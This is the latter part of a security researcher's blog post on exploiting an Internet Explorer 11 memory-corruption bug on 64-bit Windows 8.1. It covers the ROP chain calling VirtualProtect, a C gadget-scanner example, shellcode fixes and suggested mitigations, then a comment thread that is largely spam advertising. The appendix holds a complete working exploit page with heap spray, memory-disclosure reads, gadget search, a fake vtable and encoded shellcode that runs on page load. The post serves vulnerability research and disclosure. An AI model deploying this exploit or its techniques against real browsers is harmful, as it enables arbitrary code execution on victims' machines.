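Looking the slot up by name costs a few more reads through the disclosure primitive than the fixed `iat + 0x8a8` in the exploit, but it survives a rebuilt mshtml.dll whose import order differs.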

pop rcx; ret;
pop rdx; ret;
pop r8; ret;
pop r9; ret;

As it turns out, the first three are really common in mshtml.dll. The fourth one isn’t; however, for VirtualProtect the last argument (lpflOldProtect) just needs to point to writable memory, which is already the case for r9 at the time we get control over RIP, so we don’t actually have to change it.

The final ROP chain looks like this:

address of pop rcx; ret;
address on the heap block with shellcode
address of pop rdx; ret;
0x1000 (size of the memory that we want to make executable)
address of pop r8; ret;
0x40 (PAGE_EXECUTE_READWRITE)
address of VirtualProtect
address of shellcode
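A gadget scan and the chain layout above, as an added example in C (not the exploit's code). The pivot pattern is the first eight bytes of the CTableLayout::GetLastRow sequence shown earlier, the same bytes the exploit matches as four 16-bit values; the module image scanned here is constructed (NOP filler, those bytes, and three pop/ret pairs planted at chosen offsets), and the base, VirtualProtect and shellcode addresses are placeholders.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Gadget byte patterns. The pop/ret pairs are searched at every byte offset,
   so unintended instruction sequences count too. */
static const uint8_t PAT_PIVOT[]   = { 0x50, 0x5C, 0x85, 0xD2, 0x74, 0x08, 0x8B, 0x40 }; /* push rax; pop rsp; test edx,edx; je +8; mov eax,[rax+58h] */
static const uint8_t PAT_POP_RCX[] = { 0x59, 0xC3 };
static const uint8_t PAT_POP_RDX[] = { 0x5A, 0xC3 };
static const uint8_t PAT_POP_R8[]  = { 0x41, 0x58, 0xC3 };

/* Linear scan for a byte pattern; returns the offset or -1 if absent. */
long find_pattern(const uint8_t *img, size_t len, const uint8_t *pat, size_t plen)
{
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(img + i, pat, plen) == 0) return (long)i;
    return -1;
}

typedef struct { uint64_t pivot, pop_rcx, pop_rdx, pop_r8; } gadgets;

/* Resolve every gadget the chain needs relative to the module base; 0 on failure. */
int find_gadgets(const uint8_t *img, size_t len, uint64_t base, gadgets *g)
{
    long a = find_pattern(img, len, PAT_PIVOT,   sizeof PAT_PIVOT);
    long b = find_pattern(img, len, PAT_POP_RCX, sizeof PAT_POP_RCX);
    long c = find_pattern(img, len, PAT_POP_RDX, sizeof PAT_POP_RDX);
    long d = find_pattern(img, len, PAT_POP_R8,  sizeof PAT_POP_R8);
    if (a < 0 || b < 0 || c < 0 || d < 0) return 0;
    g->pivot   = base + (uint64_t)a;  g->pop_rcx = base + (uint64_t)b;
    g->pop_rdx = base + (uint64_t)c;  g->pop_r8  = base + (uint64_t)d;
    return 1;
}

#define PAGE_EXECUTE_READWRITE 0x40u

/* The chain from the post. After push rax / pop rsp, RSP points at chain[0] and
   the pivot's ret starts it. rcx/rdx/r8 carry VirtualProtect's first three
   arguments; r9 (lpflOldProtect) is left as found because it already points at
   writable memory when RIP is hijacked. */
size_t build_chain(const gadgets *g, uint64_t virtual_protect, uint64_t shellcode, uint64_t chain[8])
{
    chain[0] = g->pop_rcx; chain[1] = shellcode;              /* lpAddress: heap block with shellcode */
    chain[2] = g->pop_rdx; chain[3] = 0x1000;                 /* dwSize */
    chain[4] = g->pop_r8;  chain[5] = PAGE_EXECUTE_READWRITE; /* flNewProtect */
    chain[6] = virtual_protect;                               /* reached by the last ret */
    chain[7] = shellcode;                                     /* VirtualProtect returns here */
    return 8;
}

/* Constructed stand-in for a module image: NOP filler, the GetLastRow bytes
   quoted in the post at +0x40, and pop/ret pairs planted at chosen offsets. */
void make_sample_module(uint8_t *img, size_t len)
{
    static const uint8_t getlastrow[] = {
        0x50,0x5C,0x85,0xD2,0x74,0x08,0x8B,0x40,0x58,0xFF,0xC8,0x03,0xC2,0xC3,
        0x8B,0x81,0x84,0x01,0x00,0x00,0xFF,0xC8,0xC3 };
    memset(img, 0x90, len);
    memcpy(img + 0x40, getlastrow, sizeof getlastrow);
    img[0x63] = 0x5A; img[0x64] = 0xC3;                   /* pop rdx ; ret */
    img[0x70] = 0x59; img[0x71] = 0xC3;                   /* pop rcx ; ret */
    img[0x80] = 0x41; img[0x81] = 0x58; img[0x82] = 0xC3; /* pop r8 ; ret  */
}

int main(void)
{
    uint8_t img[0x100];
    gadgets g;
    uint64_t chain[8];
    make_sample_module(img, sizeof img);
    if (!find_gadgets(img, sizeof img, 0x7ffb26000000ULL, &g)) return 1;
    size_t n = build_chain(&g, 0x7ff8e0001000ULL, 0x000000a6d0001000ULL, chain);
    printf("pivot at 0x%llx\n", (unsigned long long)g.pivot);
    for (size_t i = 0; i < n; i++)
        printf("chain[%zu] = 0x%016llx\n", i, (unsigned long long)chain[i]);
    return 0;
}
```

Against a real module the scan runs over the bytes read back through the string-based disclosure primitive, which is why the exploit compares 16-bit units; a byte-wise compare as above also finds gadgets that start on an odd offset.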

So, we can now finally execute some x64 shellcode like SkyLined’s x64 calc shellcode that works on 64-bit Windows 7 and 8, right? Well, no. Shellcode authors usually (understandably) prefer small shellcode size over generality and save space by relying on specifics of the OS that don’t need to be true in the future versions. For example, for compatibility reasons, Windows 7 and 8 store PEB, module information structures as well as ntdll and kernel32 modules at addresses lower than 2G. This is no longer true in Windows 8.1 Preview. Also, while Windows x64 fastcall calling convention requires leaving 32 bytes of shadow space on the stack for the use of calling function, SkyLined’s win64-exec-calc-shellcode leaves just 8 bytes before calling WinExec. While this appears to work on Windows 7 and 8, on Windows 8.1 preview it will cause the command string (“calc” in this case) stored on the stack to be overwritten as it will be stored in WinExec’s shadow space. To resolve these compatibility issues I made modifications to the shellcode which I provided in the exploit. It should now work on Windows 8.1.

That’s it, finally we can execute the shellcode and have thus proven arbitrary code execution. As IE is fully 64-bit only in the touch screen mode, I don’t have a cool screenshot of Windows Calculator popped over it (calc is shown on the desktop instead). But I do have a screenshot of the desktop with IE forced into a single 64-bit process.




The full exploit code can be found at the end of this blog post.

Conclusion

Although Windows 8/8.1 packs an impressive arsenal of memory corruption mitigations, memory corruption exploitation is still alive and kicking. Granted, some vulnerability classes might be more difficult to exploit, but the vulnerability presented here was the first one I found in IE11 and there are likely many more vulnerabilities that can be exploited in a similar way. The exploit also demonstrates that, under some conditions, heap spraying is still useful even in 64-bit processes. In general, while there have been a few cases where it was more difficult to write parts of the exploit on x64 than it would be on x86 (such as finding what to spray with and overwrite, finding stack pivot sequences etc.), the difficulties wouldn't be sufficient to stop a determined attacker.

Finally, based on what I've seen, here are a few ideas to make writing exploits for IE11 on Windows 8.1 more difficult:
  • Consider implementing protection against heap spraying with JavaScript arrays. This could be implemented by RLE-encoding large arrays that consist of a single repeated value or several repeated values.
  • Consider implementing the same level of protection for the JavaScript heap as for the default heap implementation - add guard pages and introduce randomness.
  • Consider implementing Virtual Table Guard for common JavaScript objects.
  • Consider making compiler changes to remove all stack pivot sequences from the generated code of common modules. These are already scarce in x64 code so there shouldn't be a large performance impact.


Appendix: Exploit Code

<script>
 
 var magic = 25001; //if the exploit doesn't work for you try selecting another number in the range 25000 -/+ 128
 var strarr = new Array();
 var arrarr = new Array();
 var sprayarr = new Array();
 var numsploits = 0; //number of times the bug has been triggered so far
 var addrhi,addrlo;
 var arrindex = -1;
 var strindex = -1;
 var strobjidx = -1;
 var mshtmllo,mshtmlhi;

 //calc shellcode, based on SkyLined's x64 calc shellcode, but fixed to work on win 8.1
 var shellcode = [0x40, 0x80, 0xe4, 0xf8, 0x6a, 0x60, 0x59, 0x65, 0x48, 0x8b, 0x31, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x4f, 0x3c, 0x8b, 0x5c, 0x0f, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x4c, 0x1f, 0x24, 0x48, 0x01, 0xf9, 0x31, 0xd2, 0x0f, 0xb7, 0x2c, 0x51, 0xff, 0xc2, 0xad, 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xf0, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x31, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xff, 0xd7, 0xcc, 0, 0, 0, 0];

//triggers the bug
function crash(i) {
 numsploits = numsploits + 1;
 t = document.getElementsByTagName("table")[i];
 t.parentNode.runtimeStyle.posWidth = -1;
 t.focus();
 setTimeout(cont, 100);  
}

//heap spray
function spray() {
 var aa = "aa";

 //create a bunch of String and Array objects
 for(var i=0;i<50000;i++) {
   strarr[i] = aa.toUpperCase();
   arrarr[i] = new Array(1,2,3,4,5);
 }

 //heap-spray with pointers to a String object
 for(var i=0;i<2000;i++) {
   var tmparr = new Array(16000);
   for(var j=0;j<16000;j++) {
     tmparr[j] = strarr[magic];
   }
   sprayarr[i] = tmparr;
 }

 crash(0);
}

function cont() {
 if(numsploits < 5) {
   crash(numsploits);
   return;
 }
 if(numsploits < 6) {
   setTimeout(afterFirstOverwrite, 0);
   return;
 }
 //alert("done2");
 afterSecondOverwrite();
}

function afterFirstOverwrite() {
 //check which array was overwritten
 for(var i=24000;i<25000;i++) {
   arrarr[i][18] = 1;
   var a = arrarr[i][4];
   var b = arrarr[i][16];
   var c = arrarr[i][17];
   if(typeof(b)!="undefined") {
     arrindex = i;
     addrlo = b;
     addrhi = c;
     break;
   }
 }
 if(arrindex < 0) {
   alert("Exploit failed, error overwriting array");
   return;
 }
 //alert(arrindex);
 
 //re-spray to overwrite buffer capacity
 for(var i=0;i<2000;i++) {
   sprayarr[i] = new Array(32000);
 }
 CollectGarbage();
 for(var i=0;i<2000;i++) {
   for(var j=0;j<32000;j++) {
     if(j%2 == 0) {
       sprayarr[i][j] = addrlo + 8 - 0xBF4 + 3;
     } else {
       sprayarr[i][j] = addrhi;
     }
   }
 }
 //alert("done");
 crash(numsploits);
}

//unsigned to signed conversion
function u2s(i) {
 if(i>0x80000000) {
   return -(0xFFFFFFFF - i + 1);
 } else {
   return i;
 }
}

//signed to unsigned conversion
function s2u(i) {
 if(i<0) {
   return (0xFFFFFFFF + i + 1);
 } else {
   return i;
 }
}

//memory disclosure helper function, read 32-bit number from a given address
function read32(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0) + 0x10000 * strarr[strindex].charCodeAt(1);
}

//memory disclosure helper function, read 16-bit number from a given address
function read16(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0);
}

function afterSecondOverwrite() {
 arrindex = arrindex + 1;
 //adjusts the array length - gives us some space to read and write memory
 arrarr[arrindex][2+0x5000/4] = 0;
 //search for the next string object and overwrite its length and content ptr to write jscript9
 for(var i=1;i<=5;i++) {
   if((arrarr[arrindex][2 + i*0x400 - 0x20] == 2) && (arrarr[arrindex][3 + i*0x400 - 0x20] == 0)) {
     //alert("found");
     strobjidx = i*0x400 - 0x20 - 2;
     arrarr[arrindex][strobjidx+4] = 4;
     for(var j=20000;j<30000;j++) {
       if(strarr[j].length != 2) {
         strindex = j;
         break;
       }
     }
     break;
   }
 }
 if(strindex < 0) {
   alert("Exploit failed, couldn't overwrite string length");
   return;
 }
 //alert("mshtml");

 //create a mshtml object and follow references to its vtable ptr
 var lo1,hi1,lo2,hi2;
 arrarr[arrindex+1][0] = document.createElement("button");
 lo1 = s2u(arrarr[arrindex][6+0x28/4]);
 hi1 = arrarr[arrindex][6+0x28/4 + 1];
 lo2 = read32(hi1, lo1+0x18);
 hi2 = read32(hi1, lo1+0x18+4);
 mshtmllo = read32(hi2, lo2+0x20);
 mshtmlhi = read32(hi2, lo2+0x20+4);
 //find the module base
 mshtmllo = mshtmllo - mshtmllo % 0x1000;
 while(mshtmllo>0) {
   if(read16(mshtmlhi,mshtmllo) == 0x5A4D) break;
   mshtmllo = mshtmllo - 0x1000;
 }

 //find the address of VirtualProtect in the IAT
 var coff = read32(mshtmlhi, mshtmllo + 0x3C);
 var idata = read32(mshtmlhi, mshtmllo + coff + 4 + 20 + 120);
 var iat = read32(mshtmlhi, mshtmllo + idata + 16);
 var vplo =  read32(mshtmlhi, mshtmllo + iat + 0x8a8);
 var vphi =  read32(mshtmlhi, mshtmllo + iat + 0x8a8 + 4);
 //alert(mshtmlhi.toString(16)+"'"+mshtmllo.toString(16)+","+vplo.toString(16));

 //find the rop gadgets in mshtml
 var pivotlo = -1;
 arrarr[arrindex][strobjidx + 4] = 0x01000000;
 arrarr[arrindex][strobjidx + 6] = u2s(mshtmllo);
 arrarr[arrindex][strobjidx + 7] = mshtmlhi;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5C50)
     &&(strarr[strindex].charCodeAt(i+1) == 0xD285)
     &&(strarr[strindex].charCodeAt(i+2) == 0x0874)
     &&(strarr[strindex].charCodeAt(i+3) == 0x408b))
   {
     pivotlo = mshtmllo + i*2;
     break;
   }
   if((strarr[strindex].charCodeAt(i) == 0x508B)
     &&(strarr[strindex].charCodeAt(i+1) == 0x855C)
     &&(strarr[strindex].charCodeAt(i+2) == 0x74D2)
     &&(strarr[strindex].charCodeAt(i+3) == 0x8b08))
   {
     pivotlo = mshtmllo + i*2 + 1;
     break;
   }
 }
 if(pivotlo < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }
 //alert(pivotlo.toString(16));

 var poprcx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC359) {
     poprcx = mshtmllo + i*2;
     break;
   }
 }
 if(poprcx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }

 var poprdx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC35A) {
     poprdx = mshtmllo + i*2;
     break;
   }
 }
 if(poprdx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }

 var popr8 = -1;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5841) && (strarr[strindex].charCodeAt(i+1) % 256 == 0xC3)) {
     popr8 = mshtmllo + i*2;
     break;
   }
   if((Math.floor(strarr[strindex].charCodeAt(i)/256) == 0x41) && (strarr[strindex].charCodeAt(i+1) == 0xC358)) {
     popr8 = mshtmllo + i*2 + 1;
     break;
   }
 }
 if(popr8 < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }

 //prepare the fake vtable
 var eaxoffset = 6 + 0x20;
 arrarr[arrindex][eaxoffset + 0x98/4] = u2s(pivotlo);
 arrarr[arrindex][eaxoffset + 0x98/4 + 1] = mshtmlhi;
 //prepare the fake stack
 arrarr[arrindex][eaxoffset] = u2s(poprcx);
 arrarr[arrindex][eaxoffset + 1] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 2] = addrlo;
 arrarr[arrindex][eaxoffset + 3] = addrhi;
 arrarr[arrindex][eaxoffset + 4] = u2s(poprdx);
 arrarr[arrindex][eaxoffset + 5] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 6] = 0x1000;
 arrarr[arrindex][eaxoffset + 7] = 0;
 arrarr[arrindex][eaxoffset + 8] = u2s(popr8);
 arrarr[arrindex][eaxoffset + 9] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 10] = 0x40;
 arrarr[arrindex][eaxoffset + 11] = 0;
 arrarr[arrindex][eaxoffset + 12] = u2s(vplo);
 arrarr[arrindex][eaxoffset + 13] = u2s(vphi);
 arrarr[arrindex][eaxoffset + 14] = addrlo + 24 + eaxoffset*4 + 50*4;
 arrarr[arrindex][eaxoffset + 15] = addrhi;

 //encode the shellcode
 for(var i=0;i<Math.floor(shellcode.length/4);i++) {
    arrarr[arrindex][eaxoffset + 50 + i] = u2s(shellcode[i*4+3]*0x1000000 + shellcode[i*4+2]*0x10000 + shellcode[i*4+1]*0x100 + shellcode[i*4]);
 }

 //overwrite a vtable of jscript9 object and trigger a virtual call
 arrarr[arrindex][7] = addrhi;
 arrarr[arrindex][6] = addrlo + 24 + eaxoffset*4;
 //arrarr[arrindex][7] = 0x123456;
 //arrarr[arrindex][6] = 0x123456;

 //alert("done3");
 arrarr[arrindex+1].blah();
}

function run() {
 numsploits = 0;
 window.setTimeout(spray, 1000);
}

</script>
<body onload=run()>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
</body>

360 comments:

  1. ah, the shellcode bugs were my mistakes. Windows 8 did not exist at the time of writing.
    I have submitted a corrected version to Skylined to upload. It's a bit smaller than yours (eg cdq was still possible because eax was < 2Gb). Thanks for noticing the problem. :-)

  2. Regarding the stack pivot, you may have luck looking for other encodings of the "xchg rax,rsp" instruction.

    e.g. I had luck on my target using 4e 94 c3 as my pivot gadget.

  4. Does EMET have some effect on preventing the exploitation (e.g. on the stack pivot)?

  5. Re: 64-bit tab processes:

    You can get MSIE 11 to use 64-bit tab processes on Windows 8.1 through [Internet Options] settings, or setting the appropriate registry keys:

    [Internet Options] -> [Security] -> [Select your zone] -> Check [Enable Enhanced Protected Mode]
    HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = DWORD 0 ; Local intranet
    HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = DWORD 0 ; Internet

    [Internet Options] -> [Advanced] -> [Security] -> Check [Enable Enhanced Protected Mode] and [Enable 64-bit processes for Enhanced Protected Mode]
    HKCU\Software\Microsoft\Internet Explorer\Main\Isolation = "PMEM"
    HKCU\Software\Microsoft\Internet Explorer\Main\Isolation64Bit = DWORD 1

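The registry values listed in the comment above can be checked with a short audit script. This is an added example, not code from the original post or its comments; it assumes the key paths, value names and meanings exactly as the comment gives them (for instance that value 2500 set to 0 means Enhanced Protected Mode is enabled for that zone), and it only reads the registry, so it changes nothing.

```powershell
# Added audit script (not part of the original post or comments). It reads the
# per-user IE settings named in the comment above and reports whether Enhanced
# Protected Mode (EPM) and 64-bit EPM tab processes are enabled for the current user.
# Assumption: value names, paths and their meaning are taken from the comment as-is.

$zonesBase = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$mainKey   = 'HKCU:\Software\Microsoft\Internet Explorer\Main'

# Returns the registry value, or $null when the key or value does not exist.
function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    try {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop
        return $item.$Name
    } catch {
        return $null
    }
}

function Test-IeEpmConfiguration {
    $findings = @()

    # Per-zone EPM flag: according to the comment, value "2500" = DWORD 0 enables EPM.
    $zones = @{ '1' = 'Local intranet'; '3' = 'Internet' }
    foreach ($zoneId in $zones.Keys) {
        $val = Get-RegValueOrNull -Path "$zonesBase\$zoneId" -Name '2500'
        $findings += [pscustomobject]@{
            Setting = "EPM for zone $zoneId ($($zones[$zoneId]))"
            Value   = $val
            Enabled = ($val -eq 0)
        }
    }

    # Process-wide EPM switch ("PMEM") and the 64-bit tab-process flag.
    $isolation = Get-RegValueOrNull -Path $mainKey -Name 'Isolation'
    $findings += [pscustomobject]@{
        Setting = 'Isolation (EPM mode)'
        Value   = $isolation
        Enabled = ($isolation -eq 'PMEM')
    }
    $iso64 = Get-RegValueOrNull -Path $mainKey -Name 'Isolation64Bit'
    $findings += [pscustomobject]@{
        Setting = 'Isolation64Bit (64-bit EPM tab processes)'
        Value   = $iso64
        Enabled = ($iso64 -eq 1)
    }
    return $findings
}

$results = Test-IeEpmConfiguration
$results | Format-Table -AutoSize
if ($results | Where-Object { -not $_.Enabled }) {
    Write-Warning 'At least one EPM setting is not enabled: desktop IE tab processes may run as 32-bit without EPM.'
}
```

A missing value is reported as an empty Value with Enabled = False, which matches the default state the post describes (desktop tab processes 32-bit).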
  6. The most important thing in manual removal of AntiVirus Demo is to end all the related processes and then you can move to the following steps.
    it security program

    Thanks for sharing...!!!

    ReplyDelete
  7. Bappu Garry Sandhu's Latest Punjabi Song Review is available. Latest Punjabi Song Bappu of Garry Sandhu featuring Garry Sandhu, R.Cheema, Vikk Cheema released by Fresh Media Records on December 4, 2015 is here. Watch Bappu Punjabi Song.

    See more at:Bappu – Garry Sandhu Latest Punjabi Song Review

    ReplyDelete
  8. Really an amazing post..! By reading your blog post i gained more information. Thanks a lot for posting unique information and made me more knowledgeable person. Keep on blogging!!
    Hadoop Training institute in Chennai

    ReplyDelete

  9. Thank you for taking the time to provide us with your valuable information. We strive to provide our candidates with excellent care and we take your comments to heart.As always, we appreciate your confidence and trust in us.


    Base SAS Training in Chennai

    ReplyDelete
  10. I personally believe that working with wordpress means a lot for the website. The wordpress two factor authentication gives best outlook to your site ever.

    ReplyDelete
  11. Thank you for sharing such a nice and interesting blog with us. i have seen that all will say the same thing repeatedly. But in your blog, I had a chance to get some useful and unique information. I would like to suggest your blog in my dude circle. please keep on updates. hope it might be much useful for us. keep on updating...
    Software Testing Training

    ReplyDelete
  12. Thank you for sharing such a nice and interesting blog with us. i have seen that all will say the same thing repeatedly. But in your blog, I had a chance to get some useful and unique information. I would like to suggest your blog in my dude circle. please keep on updates. hope it might be much useful for us. keep on updating...

    Static application security testing sast

    ReplyDelete
  13. Thanks for sharing this information and keep updating us. This is more informatics and it really helped me to know the software Testing. Check the following links about SoftWare Testing .its really helped.
    software Testing Training in Chennai
    Best software testing training institute inChennai
    automation training in Chennai



    ReplyDelete
  14. This comment has been removed by the author.

    ReplyDelete
  15. Thanks for sharing this information and keep updating us. This content is quite informatics to me.
    Hadoop Training in Chennai | Hadoop Training Chennai | Big Data Training in Chennai

    ReplyDelete
  16. Thanks for sharing useful info,Hi We at Colan Infotech Private Limited a
    Mobile application development company in chennai,
    is Situated in US and India, will provide you best service in
    enterprise mobile app development company .
    and Colan Infotech has a group of exceedingly dedicated, inventive and creative experts with an energy for delivering exciting , helpful and stylish Web and Mobile Applications, We work with customers in a wide variety of sectors.
    We design all of our websites and applications using the responsive web design approach. Our talented team can handle all the aspects of mobility so we are rated as best service provider in
    Mobile apps development companies in chennai.

    We solidly trust that our customers start things out and there is not a viable alternative for quality of service.
    We offer custom services to a wide range of industries by exceeding our client’s expectations. You can even interact directly with the team regarding your project, just as you would with your in-house team. we always desire to solicit our customer's fruitful experience with us, we are the top notch
    Mobile App Development Company in chennai
    and mobile app development companies in Bangalore. We can provide best
    mobile app development chennai .
    We can provide cutting edge technology services in
    Mobile application development in chennai.
    Reach us for mobile app development chennai or just call us for best
    mobile app developers in chennai

    ReplyDelete

  17. These ways are very simple and very much useful, as a beginner level these helped me a lot thanks fore sharing these kinds of useful and knowledgeable information.
    Fitness SMS
    Salon SMS
    Investor Relation SMS

    ReplyDelete
  18. Someone essentially lend a hand to make severely posts I would state. That is the very first time I frequented your website page and thus far? I surprised with the analysis you made to create this particular submit incredible. Fantastic job!
    Digital Marketing Training in Chennai
    Dot Net Training in Chennai
    Hadoop Training in Chennai

    ReplyDelete

  19. I am expecting more interesting topics from you. And this was nice content and definitely it will be useful for many people.
    iOS App Development Company

    ReplyDelete
  20. Hi fellas,
    Thank you so much for this wonderful article really!
    If someone want to read more about that security I think this is the right place for you!

    ReplyDelete
  21. This blog is having the general information. Got a creative work and this is very different one.We have to develop our creativity mind.This blog helps for this. Thank you for this blog. This is very interesting and useful.
    PHP Training Institute in Chennai

    ReplyDelete
  22. Really good information... Check the following links about Dilwale movie. Its really interesting....

    Android Training Institute in Chennai

    ReplyDelete
  23. Someone essentially lend a hand to make severely posts I would state. That is the very first time I frequented your website page and thus far? I surprised with the analysis you made to create this particular submit incredible. Fantastic job!
    Architects in Chennai

    ReplyDelete
  24. This comment has been removed by the author.

    ReplyDelete
  25. I think I am quite anxious about this technical meeting and I want to know the feedback of this meeting.I am sure it will be an extremely informative one and all those will attend it will be quite beneficial. 8A security

    ReplyDelete
  26. CIITN is the Best Php training institute in Noida and delhi Ncr. You will get Live Project Training on PHP by our PHP expert who have 5+ year industrial experience.Focus on practical and live project training. In our PHP training, we you will learn core PHP, advance PHP, HTML, CSS, JavaScript, jQuery, Bootstrap, Cake PHP and Wordpress.CIITN provides 100% job assistance in PHP training. CIITN is well known PHP coaching center because our 100% PHP students are placed now.


    Ciitnoida provides Core and Advance Java Training in Noida. We have a team of experienced Java professionals who help our students learn Java with the help of Live Base Projects. The object-oriented, class-based build of Java has made it one of most popular programming languages and the demand of professionals with certification in Advance Java training is at an all-time high not just in India but foreign countries too.

    By helping our students understand the fundamentals and Advance concepts of Java, we prepare them for a successful programming career. With over 13 years of sound experience, we have successfully trained hundreds of students in Noida and have been able to turn ourselves into an institute for best Java training in Noida.


    php training in noida
    java training institute in noida
    javascript training in noida
    linux training in noida
    linux institute in noida
    red hat linux training in noida

    ReplyDelete
  27. Nice post. Thanks for your sharing. we are one of the best mosquito net in chennai.
    Mosquito Net in Chennai

    ReplyDelete
  28. CIITN is the pioneer of education providing the best PHP training in Noida as per the current industry requirement that enables candidates to land on their dream jobs in companies worldwide. CIITN Provides best PHP training course in Noida. CIITN is a renowned training company providing the best training service and also being the best PHP training institute in Noida rendering practical knowledge through training on projects and a dedicated placement assistance for all. The course curriculum for PHP training course is designed to provide in-depth knowledge that covers all the modules for the training ranging from basic to advanced level. At CIITN PHP training in Noida is supervised and managed by industrial experts having more than 10 years of experience in handling PHP projects. CIITN training comprises of both classroom as well as practical sessions to deliver an ideal environment for students that will enable them to handle difficult and complex situation when they would step into the reality of IT sector.CIITN is an excellent PHP training center in Noida with superior integrated infrastructure and newly designed labs for students to practice and pursue training for multiple courses at Noida. CIITN institute in Noida train thousands of students around the globe every year for the PHP training at an affordable price which is customised as per each candidate’s requirement of modules and content.


    PHP training in Noida

    ReplyDelete
  29. CIIT Noida provides Best MCA Courses in Noida based on the current IT industry standards that help students to get high paying jobs in Top MNCs. CIIT provides Best MCA Training in Noida, Greater Noida, and Ghaziabad. CIIT is one of the trusted MCA training institutes in Noida providing practical knowledge and 100% job assistance with basic as well as advanced level MCA subjects. CIITN is the best MCA college in Noida, greater noida, ghaziabad, delhi, gurgaon regoin.

    At CIIT MCA classes in Noida is conducted by subject experts corporate professionals with 9+ years of experience in managing real-time and live projects. Sofracle Nano Specialized MCA classes Noida is the perfect blend of academic learning and practical sessions to provide maximum exposure to students that transform an average student into a corporate professional whom companies prefer to hire.

    Best MCA College in Noida

    ReplyDelete
  30. Webtrackker Technology is a renowned name in the academic arena offering high end academic help Best java training institutes in noida and assistance to the students in different subjects.

    Java Training Institute in Noida

    Best Web Design Training Institutes in Noida

    Salesforce Training institute in noida

    Hadoop Training in Noida

    ReplyDelete
  31. . This information is impressive; I am inspired with your post writing style & how continuously you describe this topic. After reading your post, thanks for taking the time to discuss this, I feel happy about it and I love learning more about this topic
    AWS Training in Chennai | Best AWS Training Institute in Chennai | AWS Training in Velachery | AWS Training in OMR | AWS Training with Placements

    ReplyDelete
  32. Thanks for sharing this blog. This very important and informative blog Learned a lot of new things from your post! Good creation and HATS OFF to the creativity of your mind.
    Very interesting and useful blog!
    best smartphone accessories

    ReplyDelete
  33. Thanks for sharing this blog. This very important and informative blog Learned a lot of new things from your post! Good creation and HATS OFF to the creativity of your mind.
    Very interesting and useful blog!
    simultaneous interpretation booth

    silent disco headphones

    silent disco headphones
    silent disco headphones
    simultaneous interpretation equipment

    simultaneous interpretation equipment

    bosch simultaneous interpretation system

    ReplyDelete
  34. 10Daneces provides Best SQL Server Developer Training in Noida as per the current industry standards. Our training programs will enable professionals to secure placements in MNCs. 10Daneces is one of the most recommended SQL Server Developer Training Institute in Noida that offers hands on practical knowledge / practical implementation on live projects and will ensure the job with the help of advance level SQL Server Developer Training Courses. At 10Daneces SQL Server Developer Training in Noida is conducted by specialist working certified corporate professionals having 8+ years of experience in implementing real-time SQL Server Developer projects.

    10Daneces is well-equipped SQL Server Developer Training Center in Noida. Candidates will implement the following concepts under SQL Server Developer – Installing & configuring SQL Server Developer, Installing & configuring, SQL Server Developer 2008 upgrade advisor, Principals, securables and permissions, Metadata visibility by principals, Setting up logins with management studio, Site server architecture and deployment, Raid disk storage architecture – san, Storage offers from major computer manufacturers, Disaster recovery planning, Backup set verify with restore verify only, Database restore with visual tools & scripts, on real time projects along with SQL Server Developer Placement Training modules like aptitude test preparation etc.

    10Daneces is the well-known SQL Server Developer Training Center in Noida with high tech infrastructure and lab facilities. We also provide online access of servers so that candidates will implement the projects at their home easily. 10Daneces in Noida mentored more than 3000+ candidates with SQL Server Developer Certification Training in Noida at very reasonable fee. The course curriculum is customized as per the requirement of candidates/corporates.

    In addition to this, our classrooms are built-in with projectors that facilitate our students to understand the topic in a simple manner.

    ReplyDelete

  35. rpa training institute in noida

    Blockchain training institute in Noida

    WEBTRACKKER TECHNOLOGY (P) LTD.
    C - 67, sector- 63, Noida, India.
    F -1 Sector 3 (Near Sector 16 metro station) Noida, India.
    +91 - 8802820025
    0120-433-0760

    ReplyDelete
  36. Thanks for shear it.....Download Latest Version↪►► iExplorer Registration Code...... You are doing right job.

    ReplyDelete
